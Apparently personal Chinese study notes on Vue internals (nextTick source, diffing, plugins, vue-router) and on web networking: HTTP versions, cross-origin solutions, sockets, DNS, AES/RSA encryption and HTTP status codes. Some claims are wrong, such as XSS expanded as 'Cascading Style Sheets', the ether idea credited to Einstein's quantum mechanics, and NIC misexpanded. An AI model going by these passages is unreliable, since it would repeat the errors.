loop中,每次执行一个task,并执行完microtask队列中的所有microtask之后,就会进行UI的渲染。**,因为nextTick的原理就是基于此。 因此如果想获取数据更新后的dom,只需要触发一个微任务,当微任务执行完就会开始更新dom,因此在微任务的回调里就可能拿到最新的dom元素。。。但微任务又有好几种或者没有(只能退而求其次改为宏任务) 常见的宏任务(macro task): setTimeout、MessageChannel、postMessage、setImmediate; 常见的 micro task 有 MutationObsever 和 Promise.then。 栈(stack)分配固定大小内存(存放指针及基本数据类型)先进后出模型(比如浏览器history),系统自动回收内存。堆(heap)是动态分配内存大,不自动回收。队列是先进先出模型(FIFO)。 ```js // 其实MutationObsever是用来监听DOM修改事件,能够监听到节点的属性、文本内容、子节点等的改动等 // 监听到改动,就会执行里面的回调 // ios9.3以上的WebView的MutationObserver有bug, // 所以在hasMutationObserverBug中存放了是否是这种情况 if (typeof MutationObserver !== 'undefined' && !hasMutationObserverBug) { var counter = 1 // 创建一个MutationObserver,observer监听到dom改动之后后执行回调nextTickHandler var observer = new MutationObserver(nextTickHandler) var textNode = document.createTextNode(counter) // 调用MutationObserver的接口,观测文本节点的字符内容 observer.observe(textNode, { characterData: true }) // 每次执行timerFunc都会让文本节点的内容在0/1之间切换, // 切换之后将新值赋值到那个我们MutationObserver观测的文本节点上去,进而就会触发回调nextTickHandler // nextTickHandler就是我们指定的要在更新以后的dom上的操作函数 timerFunc = function () { counter = (counter + 1) % 2 textNode.data = counter } } ``` **注意:**在Vue2.4之前都是使用microtasks,但是microtask的优先级过高,在某些情况下可能会出现比事件冒泡更快的情况,但如果都使用 macrotasks 又可能会出现渲染的性能问题。所以在新版本中,会默认使用 microtasks,但在特殊情况下会使用macrotasks,比如 v-on。 对于实现 macrotasks ,会先判断是否能使用 setImmediate ,不能的话降级为 MessageChannel ,以上都不行的话就使用 setTimeout。。。然后对于微任务的话,优先使用Promise.resolve().then,如果不支持的话,就退回到宏任务 ```js /* @flow */ /* globals MessageChannel */ import { noop } from 'shared/util' import { handleError } from './error' import { isIOS, isNative } from './env' const callbacks = [] let pending = false function flushCallbacks () { pending = false const copies = callbacks.slice(0) callbacks.length = 0 for (let i = 0; i < copies.length; i++) { copies[i]() } } // Here we have async deferring wrappers using both microtasks and (macro) tasks. // In < 2.4 we used microtasks everywhere, but there are some scenarios where // microtasks have too high a priority and fire in between supposedly // sequential events (e.g. #4521, #6690) or even between bubbling of the same // event (#6566). However, using (macro) tasks everywhere also has subtle problems // when state is changed right before repaint (e.g. #6813, out-in transitions). // Here we use microtask by default, but expose a way to force (macro) task when // needed (e.g. in event handlers attached by v-on). let microTimerFunc let macroTimerFunc let useMacroTask = false // Determine (macro) task defer implementation. // Technically setImmediate should be the ideal choice, but it's only available // in IE. The only polyfill that consistently queues the callback after all DOM // events triggered in the same loop is by using MessageChannel. /* istanbul ignore if */ if (typeof setImmediate !== 'undefined' && isNative(setImmediate)) { macroTimerFunc = () => { setImmediate(flushCallbacks) } } else if (typeof MessageChannel !== 'undefined' && ( isNative(MessageChannel) || // PhantomJS MessageChannel.toString() === '[object MessageChannelConstructor]' )) { const channel = new MessageChannel() const port = channel.port2 channel.port1.onmessage = flushCallbacks macroTimerFunc = () => { port.postMessage(1) } } else { /* istanbul ignore next */ macroTimerFunc = () => { setTimeout(flushCallbacks, 0) } } // Determine microtask defer implementation. /* istanbul ignore next, $flow-disable-line */ if (typeof Promise !== 'undefined' && isNative(Promise)) { const p = Promise.resolve() microTimerFunc = () => { p.then(flushCallbacks) // in problematic UIWebViews, Promise.then doesn't completely break, but // it can get stuck in a weird state where callbacks are pushed into the // microtask queue but the queue isn't being flushed, until the browser // needs to do some other work, e.g. handle a timer. Therefore we can // "force" the microtask queue to be flushed by adding an empty timer. if (isIOS) setTimeout(noop) } } else { // fallback to macro microTimerFunc = macroTimerFunc } /** * Wrap a function so that if any code inside triggers state change, * the changes are queued using a (macro) task instead of a microtask. */ export function withMacroTask (fn: Function): Function { return fn._withTask || (fn._withTask = function () { useMacroTask = true const res = fn.apply(null, arguments) useMacroTask = false return res }) } export function nextTick (cb?: Function, ctx?: Object) { let _resolve callbacks.push(() => { if (cb) { try { cb.call(ctx) } catch (e) { handleError(e, ctx, 'nextTick') } } else if (_resolve) { _resolve(ctx) } }) if (!pending) { pending = true if (useMacroTask) { macroTimerFunc() } else { microTimerFunc() } } // $flow-disable-line if (!cb && typeof Promise !== 'undefined') { return new Promise(resolve => { _resolve = resolve }) } } ``` ***diff算法原理*** 虚拟dom对应的就是真实dom,使用`document.createElement`和`document.createTextNode`创建的就是真实节点。 我们可以做个试验。打印出一个空元素的第一层属性,可以看到标准让元素实现的东西太多了。如果每次都重新生成新的元素,对性能是巨大的浪费。 ```js var mydiv = document.createElement('div'); for(var k in mydiv ){ console.log(k) } ``` 虚拟dom可以理解为简单的对象去代替复杂的对象,virtual dom很多时候都不是最优的操作,但它具有普适性,在效率、可维护性之间达平衡。 vitrual dom另一个重大意义就是提供一个中间层,js去写UI,安卓或ios之类的负责渲染,就像rn一样 vue的diff算法来源于`snabbdom`,复杂度为O(n),这点和react一样。diff的过程就是调用patch函数,就像打补丁一样修改真实的dom 参考:https://juejin.im/post/5affd01551882542c83301da 在浏览器里还可以直接先生成代码片段,等代码片段都生成完了,在插入页面: ```js var fragment = document.createDocumentFragment() var myUl = document.createElement('ul') for(let i = 0; i<10;i++){ let myLi = document.createElement('li') myLi.innerText = 'test li' myUl.appendChild(document.createElement('li')) } element.appendChild(fragment.appendChild(myUl)) // 如下命令会创建一个新的空白的文档片段( DocumentFragment)。 document.createDocumentFragment(); // DocumentFragments 是DOM节点,但它们不是主DOM树的一部分 // 因为文档片段存在于内存中(其实这文档就存在于内容中,不用再特殊操作内存什么的了),并不在DOM树中,所以将子元素插入到文档片段时不会引起页面回流(对元素位置和几何上的计算)。 // 因此,使用文档片段通常会带来更好的性能。 // 还可以根据当前元素,插入一个新的元素,而且插入的位置也是围绕调用这个方法的元素 // 参数一就是要插入的位置,参数二就是待插入的元素 element.insertAdjacentElement(position, element); // postion有四个值 // 'beforebegin': 在该元素本身的前面. // 'afterbegin':只在该元素当中, 在该元素第一个子孩子前面. // 'beforeend':只在该元素当中, 在该元素最后一个子孩子后面. // 'afterend': 在该元素本身的后面. ``` ***vue-lazyload原理*** 参考:[vue-lazeload原理][vueLazeloadTheoryUrl] 1. vue-lazyload是通过指令的方式实现的,定义的指令是v-lazy指令 2. 指令被bind时会创建一个listener,并将其添加到listener queue里面, 并且搜索target dom节点,为其注册dom事件(如scroll事件) 3. 上面的dom事件回调中,会遍历 listener queue里的listener,判断此listener绑定的dom是否处于页面中perload的位置,如果处于则加载异步加载当前图片的资源 4. 同时listener会在当前图片加载的过程的loading,loaded,error三种状态触发当前dom渲染的函数,分别渲染三种状态下dom的内容 ***vue组件初始化原理*** 比如首先来看vue-router的使用步骤: ```js // 1 引入vue-router import VueRouter from 'vue-router' // 2 利用vue的插件机制,加载vue-router Vue.use(VueRouter) // 3 实例化VueRouter const router = new VueRouter({ routes }) // 4 实例化Vue const app = new Vue({ router }).$mount('#app') ``` **Vue的插件机制**,先来看看源码: ```js Vue.use = function (plugin: Function | Object) { const installedPlugins = (this._installedPlugins || (this._installedPlugins = [])); if (installedPlugins.indexOf(plugin) > -1) { return this; } // additional parameters const args = toArray(arguments, 1); args.unshift(this); if (typeof plugin.install === 'function') { plugin.install.apply(plugin, args); } else if (typeof plugin === 'function') { plugin.apply(null, args); } installedPlugins.push(plugin); return this; } ``` 该方法首先检查插件是否已经加载,如果已经加载,直接返回 this。 如果没有加载过,会取所有的参数,并将 this 放在第一个。优先执行 plugin.install 方法,若不能执行,则直接执行 plugin 自身。 最后将 plugin push 到插件列表中。 既然插件有install方法,那这个install方法做了什么呢? 实际上vue-router对外export了一个VueRouter的类,这个类上包含了router的各种方法,比如install。install函数里又调用Vue的方法注册mixins,components,生命周期等。。。因此这个插件里的各种方法才可以直接使用。。。 **注意:**其实vue的各种插件也可以理解为组件,比如上面的vue-router是专注于路由管理的组件,axios是专注于http请求模块的。 ***vue-router原理*** 我们都知道Ajax可以实现页面的无刷新操作,但是,也会造成**无法前进后退**。。。到了h5之后,当执行ajax操作的时候,可以向浏览器history中塞入一个地址(如:pushState,无刷新),返回的时候通过url或其他传参,就可以回到ajax之前模样,也就解决了刷新和后退的问题了。。。 本质上就是监听URL的变化,然后匹配路由规则,显示相应的页面,并且无需刷新。。。单页应用一般使用`hash`,`history`模式,非浏览器环境还有`abstract`模式 路由变更到视图变更的过程: 1. hashchange 2. match route 3. set vm_route 4. <router-view> render() 5. render matched component #### ***网络模型及协议相关*** ***网络模型*** - ISO: international Origanization for Standards (国际标准化组织) - OSI: open Systems Interconnection(开发式通信系统互联参考模型) - IETF: Internet Engineeering Task Force(非国家或国际机构等公共机构所制定的标准,但属于业界公认的标准),制定了TCP/IP - TCP/IP:最初的网络鼻祖ARPANET(阿帕网),是大学的项目,只是军事正好也需要,因此助推了网络的逐渐成型,而tcp/ip的成型源于UNIX实现了初版的TCP/IP协议,后来才慢慢被阿帕网采用,并推广,最后成为了互联网。 - ISP: 等到网络出来后,就诞生了提供互联网接入服务的公司(internet service provider) - 以太网:在爱因斯坦提出量子力学之前,人们普遍认为宇宙内充满以太,并以波的形式传送光。而以太网规范简单,易于网卡及驱动程序的实现,且以太网网卡比较便宜,因此得以普及。以太网是一种通信方式,还是需要电缆进行传输信号的。计算机内部采用二进制 1K = 1024,1M = 1024K;而在以太网中以时钟频率决定传输速度,二者并不同,1k = 1000,1M = 1000K。以太网有自己的数据格式(阮一峰的帧) - 无线通信,通过电磁波,红外线、激光等传输信号;Wi-Fi(wireless fidelity)高质量的无限lan。蓝牙也是一种 1. **实体层**传输0和1; 2. **链路层**通过mac地址广播传输数据帧(标头和数据); 3. **网络层**,路由器(DHCP)分发ip,配置子网掩码,ARP根据ip(域名解析)反解析mac地址; 4. **传输层**根据端口确定是哪个具体应用程序接收数据,udp和tcp为数据传输保驾护航,tcp三次握手四次挥手(效率低); 5. **应用层**规定传输的数据的具体格式,如html,邮件等 - 网络接口卡(NIC,network information center):也叫网络适配器、网卡、LAN卡; - 中继器:处在OSI的物理层,物理层面上延长网络的设备,其实就是将电或光信号调整波形和放大再传给下一个电缆。 - 网桥:处在OSI的数据链路层,连接两个网络的设备。有些网桥能判断是否将数据报文转发给相邻的网段,这种网桥被称为自学式网桥。交换集线器(Hub)也是网桥的一种,交换集线器中连接电缆的每个端口都能提供类似网桥的功能。可以认为交换机的每个端口实际上提供着网桥的功能。 - 路由器在OSI的网络层,连接两个网络,并对分组报文进行转发的设备。网桥根据物理地址转化,而路由器则是根据ip地址进行处理。有的路由器不但可以分担网络负荷,还具备一定的网络安全的功能。 - 网关,负责从从传输层到应用层的数据进行传输和转发的设备,还负责数据转换,在两个不能直接通信的协议之间进行翻译,最终实现通信。有时为了客户端和服务端无需直接通信,中间加一个代理或者防火墙,这些其实都是网关的一种。 - IP(internet protocol) 子网掩码的作用是标识出在 32 比特的 IP 地 址中,从哪一位到哪一位是网络地址,从哪一位到哪一位是主机地址。网掩码中,值为 1 的那些位对应着 IP 地址中的网络地址,后面 值为 0 的那些位则对应着主机地址。 虽然在这个对话框中可以手动设置 IP 地址和子网掩码,但是大多 数情况下选择的还是“自动获得 IP 地址”这个选项。这个选项使得计 算机在启动时会去从 DHCP(Dynamic Host Configuration Protocol(动态主机设 置协议) 服务器获取 IP 地址和子网掩码,并自动地 配置它们。 TCP/IP 这个词表示在网络上 同时使用了 TCP 和 IP 这两种协议。正如前面所讲解的那样,IP 协议 用于指定数据发送目的地的 IP 地址以及通过路由器转发数据。而 TCP 协议则用于通过数据发送者和接收者相互回应对方发来的确认信 号,可靠地传输数据。通常把像这样的数据传送方式称作“握手”,(Handshake)(如图 9.13 所示)。TCP 协议中还规定,发送者要先把原 始的大数据分割成以“包”(Packet)为单位的数据单元,然后再发送, 而接收者要把收到的包拼装在一起还原出原始数据。 例如,诸位敲打键盘输入的电子邮件 正文等数据,并不是原封不动地发送出去的,而是先通过实现了 TCP 协 议的程序附加上遵守 TCP 约束所需的信息,然后再通过实现了 IP 协议 的程序,进一步附加上遵守 IP 约束所需的信息。实际上计算机发送的 是以包为单位的、附加了各种各样信息的数据 硬件上发送数据的是网卡。在网卡之上是设备驱动程序(用于控制 网卡这类硬件的程序),设备驱动程序之上是实现了 IP 协议的程序,IP 程序之上则是实现了 TCP 协议的程序,而再往上才是应用程序,比如 Web 或电子邮件。这 **http1.1:**默认持久连接,但有队头阻塞问题(可同时发送多个,但响应则是挨个响应,若是第一个慢则会阻塞后面的); **http2而不是http2.0**,因为标准委员会不打算发布子版本,下一个版本直接就是http3 **http2特性:**请求头和体都是二进制;头信息压缩;多工(服务端也可发送请求)且没队头阻塞;数据流,有标识且可设置优先级,还可关闭某个请求而不是整个tcp连接; 什么是多路复用:我们知道http1.x中,我们可以并行请求的,但是浏览器对于一个域名的并行请求是有上限的(chrome,firefox上限是6个),因此如果一个静态资源站,如果想并行下载很多资源,则会有瓶颈。。。而http2在一个tcp连接内可以发送n个http请求,通过提高并发,从而减少tcp连接的开销。 如何开启http2:具体不太清楚,但我想着http2请求浏览器是支持的,因此只要服务端配置了,nginx提供了两种方法,第一种是升级操作系统,第二种是从源码编译新版本的nginx [请求头和响应头一览](http://tools.jb51.net/table/http_header) 路由器有不同的厂家,不同的厂家,其登录界面(其实就是路由器ip,不过有的厂商也会提供一个域名)不同,然后还有一个默认的登陆后台地址的密码。参考:[常见路由器ip及登录密码](https://baijiahao.baidu.com/s?id=1618518205215559854&wfr=spider&for=pc)。 路由器: - WAN口,连接猫 - LAN口,连接具体要上网的设备,比如通过网线上网的电脑 - 电源 - 重置,有时候如果登陆密码什么忘记了,可以重置,一般按住3s以上,有的提示灯会全亮 ADSL是宽带连接的一种常用方式。ADSL实际上是电话线拨号上网,通过调制解调器进行数据处理后来,再链接到英特网上去。宽带的范畴比ADSL的大,宽带的连接方法不单单只有源ADSL这一种模式,它包括光纤、xDSL(ADSl、HDSL)、ISDN等。 光纤是细细的线,需要猫转换,然后再给路由器,然后才是上网设备。 路由器虽然看起来就是个小盒子,可实际上是一台神奇的计算机。 分布在世界各地的 LAN 中的路由器相互交换着信息,互联网正是由于 这种信息的交换才得以联通。这种信息被称作“路由表”,用来记录应 该把数据转发到哪里 - 通常把在一栋建筑物内或是一间办公室里的那种小规 模网络称作 LAN。与此相对,把互联网那样的大规模 网络称作 WAN(Wide Area Network,广域网)。 - “集线器”(Hub)是负责把各台计算机的网线相互连接在一起集线设备 - “路由器”(Router)是负责把公司内的网络和 互联网连接起来的设备。 - 可以查看路由表(route),还可以查看dns(nslookup)寻址表 通常把在一栋建筑物内或是一间办公室里的那种小规 模网络称作 LAN。与此相对,把互联网那样的大规模 网络称作 WAN(Wide Area Network,广域网)。 VLAN(Virtual Local Area Network),在进行网络管理的时候,时常遇到分散网络负载、变换部署网络设备的位置等情况,此时就得修改网络的拓扑结构以及硬件线路的改造,然而使用VLAN就不需要,只需要网络的结构即可。 **http库** 最开始要实现异步加载数据但不重载页面,需要使用原生`XMLHttpRequest (XHR)`对象,但兼容性和易用性方面都不理想,因此出现ajax(异步js和xml)对其进行了初步的封装(注意ajax是一项技术),后来又有了jequry对ajax进行了封装,使得兼容性和易用性更加完善。fetch是基于XMLHttpRequest (XHR)直接修改的,对现代的 `Promise,generator/yield,async/await`友好。 `Axios`是一个基于`XMLHttpRequest`而构建的现代JavaScript库,除了支持es6还原生支持promise,还有以下突出特点: - 拦截请求和响应。 - 使用promise转换请求和响应数据。 - 自动转换JSON数据至对象。`JSON.parse( '{"result":true, "count":42}') => {result: true, count: 42}` - 取消实时请求。(这个请求在network里看不到cancel标识,如果用XMLHttpRequest直接取消则可以看到) - 支持浏览器及node。(可通过判断有无XMLHttpRequest和process进程来区分是浏览器还是node环境) 另外还有SuperAgent和Request等http库。[参考][SuperAgentAndRequestUrl] **插曲:X-Requested-With** 前面了解了ajax及各种http库,其实底层都是基于XMLHttpRequest,可以统一理解为异步ajax请求,但还有一种请求是同步请求,比如网页同步请求的js,css,图片文件等,这些请求就是基于http或https协议等来传输文件,也就可以理解为传统的http请求。 `X-Requested-With:XMLHttpRequest;`作为一个非标准的标识,多数情况下,主要用来在区分请求是传统请求还是异步ajax请求。 **跨域** 参考:[九种跨域方式实现原理(掘金)][crossSiteUrl] 同源策略/sop(Same origin policy)是一种约定,由网景公司1995年引入浏览器,它是浏览器最核心也最基本的安全功能,如果缺少同源策略,浏览器容易受到XSS(Cascading Style Sheets),CSRF(Cross-Site Request Forgery)等攻击。所谓同源是指**协议+域名+端口**三者相同,即便两个不同的域名指向同一个ip地址,也非同源。 **关于域名需要注意:** - .com、.cn、.org等为顶级域名(或一级域名) - 子域名将顶级域名再细分,因此所有的二级,三级等都是子域名 - www.zh.wikipedia.org中,wikipedia是二级域名,zh是三级域名,www是四级 - 顶级域名上层还有一个根域 . (全球13台,但也扩展了很多辅助的),默认不显示而已 **注意:**有一种观念是将顶级与一级域名分开,因此`zh.wikipedia.org`中的`wikipedia`就是一级域名,但尚无定论,知道就好。 同源策略限制一下几种行为: 1. Cookie、LocalStorage 和 IndexDB 无法读取 2. DOM 和 Js对象无法获得 3. AJAX 请求异常 **注意以下几点:** 1. 如果是协议和端口造成的跨域问题“前台”是无能为力的。 2. 在跨域问题上,仅仅是通过“URL的首部”来识别而不会根据域名对应的IP地址是否相同来判断。“URL的首部”可以理解为“协议, 域名和端口必须匹配”。 3. 跨域并不是请求发不出去,请求能发出去,服务器能收到请求并正常响应,只是结果被浏览器拦截了(根据浏览器原理因该是没发出去)。 你可能会疑问明明通过表单的方式可以发起跨域请求,为什么 Ajax 就不会?因为归根结底,跨域是为了阻止用户读取到另一个域名下的内容,Ajax 可以获取响应,浏览器认为这不安全,所以拦截了响应。但是表单并不会获取新的内容,所以可以发起跨域请求。同时也说明了跨域并不能完全阻止 CSRF,因为请求毕竟是发出去了。 解决方案: - Jsonp(客户端声明一个函数,服务端将数据传入函数并返回到前端执行,仅GET) - CORS(cross origin resource share,服务端设置Access-Control-Allow-Origin:*/白名单) - postMessage(应用在iframe之间场合比较多) - websocket(是全双工通信,同时可解决跨域) - Node中间件代理 - Nginx反向代理(翻墙是正向(隐藏客户端),反向是隐藏服务端) - window.name + iframe(name属性不同页面加载后依旧存在) - location.hash + iframe - document.domain + iframe(只适用于二级域名相同情况) **总结** 1. CORS(需服务端配置)支持所有类型的http请求,是跨域http请求的根本解决方案 2. Jsonp只支持GET请求,Jsonp的优势在于支持老式浏览器,以及可以向不支持CORS的网站请求数据 3. 不管是node中间件还是nginx反向代理,主要是通过同源策略对服务器不加限制的原因 **Socket:** 参考:[什么是socket][whatIsSocketUrl] 我们深谙信息交流的价值,那网络中进程之间如何通信?如每天浏览器浏览网页时,浏览器的进程怎么与web服务器通信?。。。 本地进程间通信(IPC)有很多种方式,如下: 1. 消息传递(管道、FIFO、消息队列) 2. 同步(互斥量、条件变量、读写锁、文件和写记录锁、信号量) 3. 共享内存(匿名的和具名的) 4. 远程过程调用(Solaris门和Sun RPC) 在本地我们可以通过PID来标识唯一的进程,但在网络中则行不通。。。但TCP/IP协议族已经帮我们解决了,ip地址唯一标识网络中的主机,协议+端口则可以锁定主机中的应用程序。因此利用ip地址、协议、端口便可以标识网络中的进程,而网络中进程间的通信则利用这个标识与其他进程进行交互。 使用TCP/IP协议的应用程序通常采用应用编程接口:UNIX BSD的套接字(socket)和UNIX System V的TLI(已经被淘汰),来实现网络进程之间的通信。就目前而言,几乎所有的应用程序都是采用socket,而现在又是网络时代,网络中进程通信是无处不在,因此也可以说:一切皆socket。 既然网络中的进程是通过socket来通信的,那什么是socket呢?socket起源于Unix,而Unix/Linux基本哲学之一就是“一切皆文件”,都可以用`“打开open –> 读写write/read –> 关闭close”`模式来操作。因此**socket是该模式的一个实现方式,socket即是一种特殊的文件,一些socket函数就是对其进行的操作**, ![consultCache](/jsArt/assets/images/js-theory/protocol-relation.png) 再看下图,就可以发现其实`socket是应用层与TCP/IP协议族通信的中间软件抽象层`。在设计模式中,socket其实就是一个门面模式,它把复杂的TCP/IP协议族隐藏在socket接口后面,对用户来说,一组简单的接口就是全部,让socket去组织数据,以符合指定的协议。 ![consultCache](/jsArt/assets/images/js-theory/socket-protocol.png) 其实,人们为计算机通信设计了若干接口,其中三个接口是通用的: 1. 套接字接口(socket interface) 2. 传输层接口(transport layer interface) 3. STREAM 套接字接口位于**操作系统与应用层之间**,如果应用程序想接入TCP/IP协议族提供的服务,就必须使用套接字接口中定义的指令,即socket编程: ![consultCache](/jsArt/assets/images/js-theory/socket-system.png) 前端与后端交互时,一般都使用ajax,但ajax无法实时获取更新的数据,采用轮询方式开销会非常大,且后端也无法主动推送数据给前端。vue提供了socket.io来解决这个问题,一旦数据进行更新,服务端可主动将数据推送至客户端,常用于消息类推送的场景中。 **WebSocket:**一种在单个tcp连接上进行的全双工通讯的协议 感觉webscoket和http2在双向通信方面很像,其实websocket只是基于http1.1建立的一个tcp长连接,进而可以双向传输二进制数据等。但http2只是对HTML、CSS等JS资源的传输方式进行了优化,并没有提供新的JS API,也不能用于实时传输消息。如果需要实时传输消息,现在还是需要SSE,WebSocket等 原生WebSocket API使用起来不太方便,我们使用Socket.io,它很好地封装了webSocket接口,提供了更简单、灵活的接口,也对不支持webSocket的浏览器提供了向下兼容。 ***DNS*** 域名解析有递归和迭代,递归是本地dns服务器去查询,最后将结果返回给浏览器端。而迭代则是浏览器端主动去根,域服务器查询ip与域名的对应关系。 浏览器里也有dns缓存,`chrome://net-internals/#dns`即可查看,但好像只有清除 mac下hosts文件 `cat /etc/hosts` /是根目录,~是用户家目录,因为一个系统下可以有多个用户 **NAT**(Network Address Translation 网络地址转换) **UPnP**(Universal Plug and Play 通用即插即用) 常用的dns服务器地址: - 223.5.5.5 阿里 - 114.114.114.114 电信 - 119.29.29.29 腾讯 - 1.2.4.8 国家某机构 - 8.8.8.8 谷歌 **数据加密和https** https无非是身披ssl的http,而ssl加密是发生在应用层与传输层之间,而抓包工具截获的是http传输的数据,也就是应用层的数据,因此通过安装证书可以看到明文信息。https通信保证了客户端到服务端的通信过程是安全的,但如果客户端本地有恶意软件,则无法阻止攻击。 银行系统一般还需要手机令牌,这些手机令牌是用来输入密码用的,也就是说,如果用系统的键盘输入密码,客户端的恶意软件可能拦截到密码,因此银行系统将输入密码的设备独立,这样就能阻止客户端上的恶意软件了。 综上: 1. 若只为保证客户端到服务端之间的通信安全,https就足够 2. 若想在客户端也不让用户看到明文,则需要配合另外aes和rsa加密 AES对称加密 1. 甲方选择某一种加密规则,对信息进行加密 2. 乙方使用同一种规则,对信息进行解密 由于加密和解密使用同样规则(即密钥),因此如何传递密钥便是问题 ```js let CryptoJS = require( "crypto-js" ); let AES = CryptoJS.AES; enCryptoJS: function ( text ) { return AES.encrypt( text, key , { iv: iv , mode: CryptoJS.mode.CBC, //CBC,CFB,CTR,OFB,ECB padding: CryptoJS.pad.Iso10126 //Iso10126,Iso97971,ZeroPadding,NoPadding,AnsiX923,Pkcs7 } ).toString() }, ``` RSA非对称加密 1. 乙方生成两把秘钥(公钥和私钥),公钥是公开的,任何人都可以获得,私钥是保密的 2. 甲方获取乙方的公钥,然后用它对信息加密 3. 乙方得到加密后的信息,用私钥解密 加密和解密可以使用不同的规则,只要这**两种规则之间存在某种对应关系**即可,这样就避免了直接传递密钥。 Native与服务端加密通信过程: 1. 原生端有RSA的私钥和公钥,服务端有RSA的公钥和AES的密钥 2. 服务端用RSA的公钥对AES的密钥进行加密,然后传输给原生端 3. 原生端用RSA的私钥对来自服务端的加密串解析,得到AES的密钥 4. 用这个AES的密钥加密,再通过bridge给h5端。(对于h5端需要与服务端直接交互的,暂时没做处理) 上面安全的前提是,app本身是安全的,若加固被攻克,则安全性全无。。。不过现在借助一些商业软件进行加固已经很难破解了。 如果想再提高安全等级,可以对利用一套算法动态生成客户端的RSA私钥和公钥,即使截获了算法,由于是动态生成,也无法重现之前的密钥。这是动态生成层面,还可以动态存储,也就是通过一定的手段,将存储密钥的内存地址动态变化。。。这样只能尝试进程注入去尝试获取密钥。 **为何有些https网站不需要证书**:其实大多数认证只是认证颁发机构(比如某个服务的证书颁发机构已经被认可,则后续这个颁发机构签名所有服务名都不需要证书),不用单独安装证书。。。对于双向认证的才需要安装证书 **数字签名**:私钥做签名,公钥做校验 ***CDN延时*** CDN的全称是Content Delivery Network,即**内容分发网络**。CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率(比如火车票代售点)。CDN的关键技术主要有内容存储和分发技术。 参考:[CDN的那些事][aboutCdnUrl] 、[CDN回源][aboutCdnHuiYuanUrl] ***schema协议*** URL Scheme使用场景,目前1,2,5使用场景很广,有没有一种熟悉的感觉? 1. 通过小程序,利用Scheme协议打开原生app 2. H5页面点击锚点,根据锚点具体跳转路径APP端跳转具体的页面 3. APP端收到服务器端下发的PUSH通知栏消息,根据消息的点击跳转路径跳转相关页面 4. APP根据URL跳转到另外一个APP指定页面 5. 通过短信息中的url打开原生app 互联网数据中心(Internet Data Center)主要为互联网内容提供商(ICP)、企业、媒体和各类网站提供大规模、高质量、安全可靠的专业化服务器托管、空间租用、网络批发带宽以及ASP、EC等业务。 **CNAME:**当您拥有多个域名需要指向同一服务器IP,此时您就可以将一个域名做A记录指向服务器IP ***数据流模式*** http协议传输数据时可以选择`Transfer-Encoding: chunked`模式,也就是数据流模式,传输的数据是分块的,而不是一个完整的数据包。对于服务器处理慢的场合尤为适用。 ***常见端口号*** - TCP 21端口:FTP 文件传输服务 - TCP 23端口:TELNET 终端仿真服务 - TCP 25端口:SMTP 简单邮件传输服务 - UDP 53端口:DNS 域名解析服务 - TCP 80端口:HTTP 超文本传输服务 - TCP 110端口:POP3 “邮局协议版本3”使用的端口 - TCP 443端口:HTTPS 加密的超文本传输服务 ***http协议状态码*** 参考:[http状态码(mdn)][mdnHttpStatusCodesUrl] http响应状态码指示特定http请求是否已成功完成,响应分为五类:信息响应,成功响应,重定向,客户端错误和服务端错误。 1. 信息响应 ```js 100 // Continue 所有内容有效可继续请求,若请求已完成则忽略 101 // Switching Protocol 该代码是响应客户端的 Upgrade 标头发送的,并且指示服务器也正在切换的协议。 102 // Processing 此代码表示服务器已收到并正在处理请求,但没有响应可用 ``` 2. 成功响应 ```js 200 // Ok 请求成功 204 // No Content服务器已成功处理请求,但不需要返回实体,并且希望返回更新了的元信息 // 其实查看以下,204时,是 OPTIONS 请求,因此没有响应体。 ``` 3. 重定向 ```js 301 // Moved Permanently 被请求的资源已永久移动到新位置(应该返回新的地址) 302 // Found 请求的资源临时从不同的 URI 响应请求 304 // Not Modified ,一般���针对get或put请求? ``` 4. 客户端响应 ```js 400 // Bad Request 语义或请求参数有误,请求无法被服务器理解 401 // Unanthorized 当前请求需要用户验证。 403 // Forbidden 服务器已经接受到请求,但拒绝执行它。服务器可以返回拒绝执行原因 404 // Not Found 请求所希望的资源未在服务器发现 405 // Method Not Allowed 响应返回允许的请求方式 408 // Request Timeout 请求超时,客户端没有在服务端预备等待的时间内完成一个请求的发送 ``` **注意:**401是说客户端需要认证,比如需要登录。。。而403是客户端认证通过(比如登录成功),但是没有权限 1. 服务端响应 ```js 500 // Internal Server Error 服务器遇到不知如何处理的情况 501 // Not Implemented 此请求方法不被服务器支持且无法被处理 502 // Bad Gateway 服务器作为网关需要得到一个处理这个请求的响应,但是得到一个错误的响应 503 // Service Unavailable 服务器没有准备好处理请求(比如宕机或服务没起来) 504 // Gateway Timeout 服务器(不一定是 Web 服务器)正在作为一个网关或代理来完成客户(如您的浏览器或我们的 CheckUpDown 机器人)访问所需网址的请求。 为了完成您的 HTTP 请求, 该服务器访问一个上游服务器, 但没得到及时的响应。这通常意味着上游服务器已关闭(不响应网关 / 代理),而不是上游服务器和网关/代理在交换数据的协议上不一致。(比如ip地址可以ping通,但具体项目的后端没有起来,就报504错误) 505 // HTTP Version Not Supported 服务器不支持请求中使用的http版本 // 503的一个场景: // 公司的公网域名解析到具体服务实例上,如果实例销毁或将域名与服务解绑, // 此时若dns解析仍指向实例,就会报503。 // 若是访问一个不存在的域名,则直接回找不到页面。 ``` **注意:**502状态码可以这样理解,比如当ngnix充当反向代理时,会将http协议的请求转换为其他协议的请求,其他协议请求再给对应语言的进程处理,当处理完响应的内容无法被ngnix理解就会报502 Bad Gateway。而500一般是服务器内部逻辑出错,503是服务器没有起来或者是服务器处理不过来。。。 502 Bad Gateway 是一种HTTP协议的服务器端错误状态代码,它表示作为网关或代理角色的服务器,从上游服务器(如tomcat、php-fpm)中接收到的响应是无效的。 Gateway (网关)在计算机网络体系中可以指代不同的设备,502 错误通常不是客户端能够修复的,而是需要由途径的Web服务器或者代理服务器对其进行修复。 #### ***缓存相关*** ***强制和协商缓存*** 参考:[强制缓存与协商缓存][aboutForceCacheUrl]、[http缓存控制][aboutConsultCacheUrl]、[浏览器缓存浅析][browserCacheAnalyseUrl]、[浏览器的默认策略][aboutBrowserDefaultUrl] 浏览器的缓存机制也就是我们常说的http缓存机制,是根据http报文的缓存标识进行。第一次浏览器请求服务器,会根据响应报文中的http头的缓存标识,决定是否缓存结果,是则存储并将标识存入浏览器缓存中。 **注意**: 1. 浏览器每次发送请求,都会先在浏览器缓存中查找该请求的结果以及缓存标识 2. 浏览器每次拿到返回的请求结果都会将该结果和缓存标识存入到浏览器缓存中 根据是否向服务器重新发送http请求,将缓存分为强制和协商缓存: 